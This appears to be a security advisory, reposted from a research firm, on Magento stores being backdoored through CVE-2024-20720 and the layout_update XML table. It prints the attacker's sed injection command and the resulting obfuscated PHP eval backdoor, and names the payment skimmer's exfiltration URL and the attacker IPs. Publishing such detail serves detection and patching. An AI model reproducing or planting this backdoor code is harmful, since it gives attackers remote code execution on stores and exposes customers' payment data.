Summary: This content discusses a recent attack on Magento websites where threat actors injected shell code into the XML code of the layout_update database table, allowing them to execute system commands and create a remote code execution backdoor.
Threat Actor: Unknown | Unknown
Victim: Magento websites | Magento websites
Key Point :
- The attack involved injecting shell code into the XML code of the layout_update database table.
- The shell code allowed the threat actors to execute system commands and create a remote code execution backdoor.
- The attack exploited the Magento layout parser and the beberlei/assert package to execute the commands.
- The backdoor could be accessed by POSTing a command to /cms/index.
- The attack used the CVE-2024-20720 vulnerability, which was discovered in February 2024.
- The attacker also injected a fake Stripe payment skimmer to steal payment data.
- Affected merchants are advised to run an eComscan scanner and upgrade their Magento version to protect against the attack.
- The attacker IPs observed in this attack were 45.146.54.58, 45.146.54.59, 45.146.54.61, 45.146.54.67, 216.73.163.170, and 216.73.163.182.
Oops, your XML now contains shell code
The following XML code was found in the layout_update database table and is responsible for periodic reinfections of your system.
Attackers combine the Magento layout parser with the beberlei/assert package (installed by default) to execute system commands. Because the layout block is tied to the checkout cart, this command is executed whenever <store>/checkout/cart is requested. In this case, the command is sed, which adds a backdoor to the (automatically generated) CMS controller. Clever, because the malware would be reinjected after a manual fix or a bin/magento setup:di:compile run:
sed -i "s/___init();/___init();n if ( isset ( $_POST [ "7faa27b473" ]) ) {n $catalogQuery ="bas" . "e64_de". "code" ;n @ eval ( $catalogQuery ( strrev ( $_POST ["7faa27b473"] ) ));n exit ( 0 ) ;n }/g"
../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php
And this leads to a remote code execution backdoor which can be used by POSTing a command to /cms/index
public function __construct(MagentoFrameworkAppActionContext $context, MagentoFrameworkControllerResultForwardFactory $resultForwardFactory, ?MagentoFrameworkAppConfigScopeConfig
{
$this->___init();
if ( isset ( $_POST [ "7faa27b473" ]) ) {
$catalogQuery ="bas" . "e64_de". "code" ;
@ eval ( $catalogQuery ( strrev ( $_POST ["7faa27b473"] ) ));
exit ( 0 ) ;
}
parent::__construct($context, $resultForwardFactory, $scopeConfig, $page);
}
This is the first time that we see actual abuse of CVE-2024-20720, which was discovered just this February by security researcher blaklis.
The attacker used this mechanism to inject a fake Stripe payment skimmer, which would copy payment data to https://halfpriceboxesusa.com/pub/health_check.php (apparently another compromised Magento store).
Next steps for affected merchants
If you are affected, make sure to run our eComscan scanner to uncover any hidden backdoors on your system, see below for a 1-click scan command.
Next, make sure to upgrade your Magento to 2.4.6-p4, 2.4.5-p6 or 2.4.4-p7. See our version matrix for a useful overview.
Attribution
We observed the following attacker IPs:
45.146.54.58
45.146.54.59
45.146.54.61
45.146.54.67
216.73.163.170
216.73.163.182
Read more
Source: https://sansec.io/research/magento-xml-backdoor
“An interesting youtube video that may be related to the article above”
Views: 2